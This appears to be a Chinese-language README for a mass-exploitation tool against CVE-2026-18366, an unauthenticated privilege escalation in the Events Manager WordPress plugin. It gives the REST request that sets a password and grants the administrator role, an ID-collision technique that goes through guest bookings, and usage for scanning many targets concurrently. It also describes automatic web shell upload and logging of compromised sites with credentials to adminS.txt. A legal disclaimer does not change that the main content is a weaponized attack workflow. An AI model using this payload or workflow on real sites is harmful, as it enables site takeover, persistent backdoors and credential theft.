Events Manager < 7.4.1 - 未认证权限提升至管理员
| 属性 | 详情 |
|---|---|
| CVE ID | CVE-2026-18366 |
| 严重性 | 🔴 严重 (CVSS 9.8) |
| 插件 | Events Manager for WordPress |
| 受影响版本 | < 7.4.1 |
| 漏洞类型 | 未认证权限提升 |
| 攻击向量 | 网络 |
| 认证要求 | 无 |
漏洞存在于 classes/em-archetypes.php 中的 EM\Archetypes::map_meta_cap。该插件错误地限定了能力映射的范围:
event 或 location 自定义文章类型(CPT),则会清空 $caps = []edit_user、delete_user 或 promote_user 填充能力has_cap() 返回 true,包括对用户 0(访客)POST|PUT|PATCH /wp-json/wp/v2/users/{id}
POST /index.php?rest_route=/wp/v2/users/{id}
Body: {"password":"...","roles":["administrator"]}
条件: {id} 必须与 event 或 location 自定义文章类型(CPT)的 wp_posts.ID 相等。
⚠️ 未认证的 REST 请求不需要 nonce(无登录 Cookie)。
访客预订(默认 dbem_bookings_anonymous=1)会创建真实的 WP 用户,从而可以强制进行 ID 碰撞。预订 nonce 在活动表单上是公开可用的。
pip install aiohttp
python CVE-2026-18366.py
脚本将提示输入:
list.txt)python CVE-2026-18366.py -l targets.txt -s 20 --timeout 30
| 选项 | 描述 |
|---|---|
-l, --list | 包含目标 URL 的文件的路径 |
-s, --speed | 并发工作线程数(1-200) |
--timeout | 请求超时时间(秒,默认:20) |
创建一个 list.txt 文件,每行一个目标:
https://target1.com
https://target2.com/wordpress
http://target3.com
target4.com
[+] [HH:MM:SS] target.com ADMIN username:password uid=X path
[+] [HH:MM:SS] target.com SHELL https://target.com/wp-content/plugins/...
成功入侵的目标将保存到 adminS.txt:
https://target.com | username:Nx_admin_@!KSA | uid=X | path=id-collision | ADMIN | shell_url
┌─────────────────────────────────────────────────────────────────┐
│ CVE-2026-18366 Flow │
├─────────────────────────────────────────────────────────────────┤
│ │
│ ┌──────────┐ ┌─────────────┐ ┌──────────────────────┐ │
│ │ Detect │ → │ Collect IDs │ → │ PATH A: ID Brute │ │
│ │ Plugin │ │ (CPT/HTML) │ │ REST /users/{id} │ │
│ └──────────┘ └─────────────┘ └──────────┬───────────┘ │
│ │ │
│ ┌──────▼──────┐ │
│ │ Success? │ │
│ └──────┬──────┘ │
│ No │ │ Yes │
│ ┌──────────▼──────▼──────────┐ │
│ │ │ │
│ ┌──────────────────────┐ │ ┌─────────────────┐ │ │
│ │ PATH B: Guest Book │ ←───┘ │ Login + Verify │ │ │
│ │ Create user until │ │ Admin Access │ │ │
│ │ user_id == post_id │ └────────┬────────┘ │ │
│ └──────────────────────┘ │ │ │
│ ┌────────▼────────┐ │ │
│ │ Upload Shell │ │ │
│ │ (Plugin/Theme) │ │ │
│ └────────┬────────┘ │ │
│ │ │ │
│ ┌────────▼────────┐ │ │
│ │ Save Results │ │ │
│ │ adminS.txt │ │ │
│ └─────────────────┘ │ │
│ │ │
└────────────────────────────────────────────────────────────────┘
├── CVE-2026-18366.py # Main exploit script
├── list.txt # Target URLs (create this)
├── adminS.txt # Successful results (auto-created)
└── README.md # This documentation
╔══════════════════════════════════════════════════════════════════╗
║ LEGAL DISCLAIMER ║
╠══════════════════════════════════════════════════════════════════╣
║ ║
║ This tool is provided for EDUCATIONAL and AUTHORIZED ║
║ SECURITY TESTING purposes only. ║
║ ║
║ • Only use on systems you own or have explicit permission ║
║ • Unauthorized access to computer systems is ILLEGAL ║
║ • The author is NOT responsible for any misuse or damage ║
║ • By using this tool, you agree to these terms ║
║ ║
║ Use responsibly. Stay ethical. Respect the law. ║
║ ║
╚══════════════════════════════════════════════════════════════════╝
如果您是 WordPress 管理员: